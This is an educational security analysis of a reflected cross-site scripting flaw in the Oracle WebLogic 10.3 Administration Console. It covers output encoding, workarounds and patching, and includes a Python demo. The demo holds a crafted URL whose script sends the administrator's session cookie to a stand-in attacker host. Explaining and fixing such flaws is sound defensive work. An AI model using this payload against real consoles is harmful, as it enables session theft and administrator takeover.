Information Assurance

Mike Roumanos



Bugtraq Analysis

ACROS Report

HTML Injection in Oracle WebLogic Server Console

What the problem is

The Administration Console of Oracle's WebLogic Server 10.3 was found to be susceptible to an HTML injection (a reflected cross-site scripting flaw) that can be used to gain administrator access. The attacker constructs a URL to the console that carries HTML or script in one of its parameters. If an administrator who is logged in to the console clicks that link, the injected script runs in the administrator's browser, inside the console session, and can send private data such as the session cookie to the attacker's server. With that data the attacker can act with administrator privileges on the WebLogic Server.

What is an HTML injection? It is an attack in which malicious input supplied to a web application, typically through a web browser, is copied into a page the server generates without being encoded, so the victim's browser treats it as markup or script instead of displaying it as text. When the injected content is script that then runs in another user's browser, the attack is called Cross-Site Scripting (XSS).

How does it work? The attacker injects HTML or script through input the site accepts, such as form fields (e.g. a search box) or parameters in a specially constructed URL, and the server echoes that input back into a page. This can result in anything from adding harmless HTML features to a page to absconding with user cookies, which may contain session identifiers and other private data. For example, the input "<h4><font color=red>HTML Code Injected by User!</font></h4>" is a simple injection: if a vulnerable page echoes it unencoded, the browser renders a red heading instead of showing the literal text.

On a susceptible server, the same injection point can carry script instead of harmless markup and be used to reach web server functions and private data.

What could have prevented it

The console could have encoded the URL argument before placing it in the page. Entity-encoding the characters that carry meaning in HTML (<, >, &, " and ') makes any HTML or script in the submitted URL display as text rather than render or execute. Rejecting and logging requests whose parameters contain markup is a useful extra layer, but it is not a substitute for output encoding, because filters are routinely bypassed with alternative encodings.
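The following Python sketch is an added example written for this page; it is not code from the ACROS report, from this page's original demo, or from WebLogic itself. It covers both the injection mechanics described above (a crafted URL whose parameter is echoed back unencoded) and the fix (entity-encoding the reflected value). The console host, the `attacker.example` host, the parameter name `q` and the cookie-stealing payload are all constructed placeholders; WebLogic's real console is written in Java, but the encoding principle is identical (for instance JSTL's `fn:escapeXml`).

```python
import html
from urllib.parse import urlparse, parse_qs

# Constructed attacker link: a logged-in administrator is tricked into clicking it.
# The query parameter decodes to a script that sends document.cookie to the
# attacker's host (attacker.example is a placeholder, not from the advisory).
MALICIOUS_URL = (
    "http://weblogic.example:7001/console/search?q="
    "%3Cscript%3Enew%20Image().src%3D%27http%3A%2F%2Fattacker.example%2F%3Fc%3D%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)

# The harmless injection shown on this page; it only changes how the page looks.
PAGE_EXAMPLE = "<h4><font color=red>HTML Code Injected by User!</font></h4>"


def query_from_url(url: str) -> str:
    """Return the decoded value of the q parameter, as the server would see it."""
    return parse_qs(urlparse(url).query).get("q", [""])[0]


def render_vulnerable(q: str) -> str:
    """Reflect the parameter into the page verbatim: this is the injection point."""
    return f"<html><body><h2>Search results for: {q}</h2></body></html>"


def render_hardened(q: str) -> str:
    """Entity-encode the parameter so the browser shows it as text, not markup.

    html.escape(..., quote=True) rewrites < > & " and ', which covers the
    element-content context this page reflects into.
    """
    return f"<html><body><h2>Search results for: {html.escape(q, quote=True)}</h2></body></html>"


def contains_injected_script(page: str) -> bool:
    """Crude detector: does the rendered page contain a live <script> element?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    q = query_from_url(MALICIOUS_URL)
    print("decoded parameter:", q)
    print("vulnerable page :", render_vulnerable(q))
    print("hardened page   :", render_hardened(q))
    print("page example, hardened:", render_hardened(PAGE_EXAMPLE))
```

Running the block shows the decoded parameter starting with `<script>`, the vulnerable page carrying that script tag intact, and the hardened page carrying `&lt;script&gt;...&lt;/script&gt;`, which a browser displays as literal text. Note that the `+` in the payload had to be sent as `%2B`: a bare `+` in a query string decodes to a space, which is the kind of encoding detail a rejection filter has to get right and an output encoder does not need to care about.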

What can be done to work around it

This injection relies on the Administration Console of the WebLogic Server. Disabling the console removes this path to administrator access. Also, since the attack is delivered through a crafted URL, administrators should avoid clicking links from unidentified sources while they are logged in to the Administration Console.

What can be done to prevent it from occurring in the future

Oracle has published a patch that fixes this issue; applying it removes the vulnerability. More generally, every value the console reflects into a page must be output-encoded so that a new parameter cannot reintroduce the same flaw.